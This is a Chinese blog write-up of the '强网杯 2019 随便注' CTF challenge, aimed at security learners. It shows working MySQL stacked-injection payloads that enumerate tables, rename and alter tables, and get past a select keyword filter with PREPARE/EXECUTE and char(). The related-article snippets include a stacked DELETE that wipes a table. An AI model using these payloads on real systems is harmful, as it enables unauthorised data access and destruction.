一天一道CTF 第三天(堆叠注入改表名)

最新推荐文章于 2023-08-14 17:21:09 发布
最新推荐文章于 2023-08-14 17:21:09 发布
阅读量414 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/114280288
版权

[强网杯 2019]随便注

今天的也是SQL注入,输入1'报错显示说明闭合符号是'
在这里插入图片描述
再随便试试-1’ union select 1,2,3 --+,回显return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
preg_match本来的作用是一个匹配函数,也就是在我们输入的语句中查找是否存在select等关键词,i表示大小写不敏感,无法用大小写混搭来绕过。
在网上查了一下可以用堆叠注入,1';show databases;#查看数据库名
在这里插入图片描述
1';show tables;#查看表名,发现有两个表word和1919810931114514
在这里插入图片描述

1';show columns from word;#发现里面有一个int和一个varchar,应该就是我们之前正常查询时查到的表
在这里插入图片描述
查1919810931114514表时要加反单引号,看结果flag就在这个表里

1';show columns from `1919810931114514`;#

在这里插入图片描述
要查看这个flag的内容就要用到骚操作了,我也是网上看的大神的解法(这是一般人能想出来的?)
因为我们可以查询word表里的数据,就想办法把1919810931114514表的名字改成word,把原word表换一个名,再把列名flag改成id或者data,以下是payload。最后再1' or '1'='1显示全部结果即可。

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) ;show columns from words;#

也可以使用预定义处理语句绕过select过滤,以下三个payload都可以得到flag。都是给hacker先赋值一个语句,然后再执行hacker。char() 函数将ASCII码转换为’select’,concat()函数再将它拼接成字符串。今天头有点晕就不具体写了。

1';PREPARE hacker from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE hacker;#

1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE hacker from @sqli;EXECUTE hacker;#

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#

参考网站:https://www.cnblogs.com/wjw-zm/p/12359735.html

scrawman
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF——sql注入堆叠注入整理
weixin_51735061的博客
03-04 5661
对sql注入中的堆叠注入的整理。整理基于“强网杯2019随便注”
堆叠注入--攻防世界CTF赛题学习
weixin_52515588的博客
03-24 754
发现对关键字都进行了过滤,那么接下来想用常规思路得到数据是不可能了,就利用堆叠注入。可以确定用户输入的内容被带入到数据库中查询了,那么就可以确定这个位置有注入漏洞。在这里大家额外补充一下关于mysql中handler的知识点,我也是现查的。在这发现了flag,这里查询的时候注意一下,需要用``把表名括起来。堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。接下来就是手工注入的常见思路,利用order by来猜列。
[GYCTF2020]Blacklist 1堆叠注入
weixin_45577185的博客
07-20 126
答案链接 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;# 堆叠注入小tips ...
CTF [SUCTF 2019]EasySQL writeup 堆叠注入 | || *的使用
baynk的博客
04-01 2456
专挑注入的题先做。。。 0x01 干干干 给flag, 然后又试了',",-1等查找注入点的参数,发现存在整形注入,出现Nonono.都是被检测出来有过滤,于是去fuzz了下。 这些都是被过滤的,于是发现有个|和||没有被过滤,可以搞盲注,但是or被过滤了,information也连带着用不了,这玩意用不了常规的注入好像也没用,报错信息也关了,报错注入也用不了。于是又看前端的输出感觉像堆叠注...
BUUCTF-堆叠注入-文件包含
m0_64180167的博客
03-28 573
提示我们是include 文件包含打开环境点击我们include 尝试直接访问根目录 失败使用伪协议base64解密。
2021CTF工业信息安全大赛第三场题.rar
07-05
2021CTF工业信息安全大赛第三场题.rar
CTF web安全经典例题讲解
10-22
该内容为CTF赛题web安全经理例题讲解,包含sql注入,密码学、文件上传,提权、抓包改包等多种题型讲解,图文结合,适合新手学习。
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
[GYCTF2020]Blacklist堆叠注入
qq_43801002的博客
04-27 3312
[GYCTF2020]Blacklist 1';show columns from `FlagHere`; %23 查看列 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭...
[GYCTF2020]Blacklist(堆叠注入
记录学习,一起进步
01-19 1960
[GYCTF2020]Blacklist(堆叠注入
Stached injection -- 堆叠注入
RuoLi_s的博客
12-30 202
Stached injection – 堆叠注入 原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14208908.html 0x00 堆叠注入的定义 ​ Stacked injection 汉语翻译过来后,称 为堆查询注入,也有称之为堆叠注入堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询,可以达到修改数据和调用存储过程的目的。 0x01 堆叠注入的原理 ​ 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql
堆叠注入进阶--(buuctf-随便注、GYCTF-black_list)【多方法详解】
bin789456的博客
08-14 188
了解一下 堆叠注入基础知识及其他题目: 【】 Buuctf-随便注 算是堆叠注入中非常经典的题目了。 随便试试就能看到黑名单: 没了select,其实大概率就是堆叠注入 先探测一下: 1';show databases;# 应该就是了。 再看看表: 1';show tables;# 然后查看表的结构先找到flag的位置: 1';desc `1919810931114514`;# 注:在mysql中,数字作为名称都要带上`这个符号来使用,用show columns from `191981093
[SUCTF 2019]EasySQL——堆叠注入
m0_46607055的博客
09-02 235
1、猜测执行语句 sql注入都需要先猜测后端的查询语句,有时候是语句结构,像闭合的字符串,其他的逻辑运算符,有时候是猜测信息,像查询字段、字段数、表名。 拿到题目,可以分类输入字符串,根据回显推测查询语句。 我个人的基本思路是 先 数字,再字母,再拼接特殊符号。 先试试 1, 再 abc,。没回显,放弃字母。 继续尝试特殊字符,1' --> 没有回显 。1" --> 回显nonono1; 回显 array 目前猜测(可能不对,但是先...
BUUCTF-Web-随便注(堆叠注入)
m0_46315342的博客
08-12 369
这里转载一个大佬的博客: 作者:简简的我 链接:https://www.jianshu.com/p/36f0772f5ce8 来源:简书 然后我简单说一下这个题目吧,这是个sql注入的题目,过滤了select这样的关键字,双写和大小写以及空格都不能进行绕过,所以这里使用的是堆叠注入。 这个作者讲了三种方法,但是第三种好像有点难,第一种和第二种是比较容易接受的。主要是学习一下堆叠注入的语法吧,和sql有点点不一样。然后第二种方法里面作者还讲了一下预处理语句,感觉很牛逼。 ...
MYSQL注入天书之stacked injection
weixin_34221332的博客
08-11 635
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
2021-07-08 CTFer成长之路-SQL注入-报错注入堆叠注入
热门推荐
时光隧道
07-08 5万+
一:报错注入 报错注入可以获取数据表的账号密码 二:堆叠注入 可以删除数据表的数据 http://192.168.20.133/sql4.php?id=1%27;delete%20%20from%20wp_files;%23
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 581
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在注册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了 二、 学到的&&am
ctf sql注入题目
最新发布
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值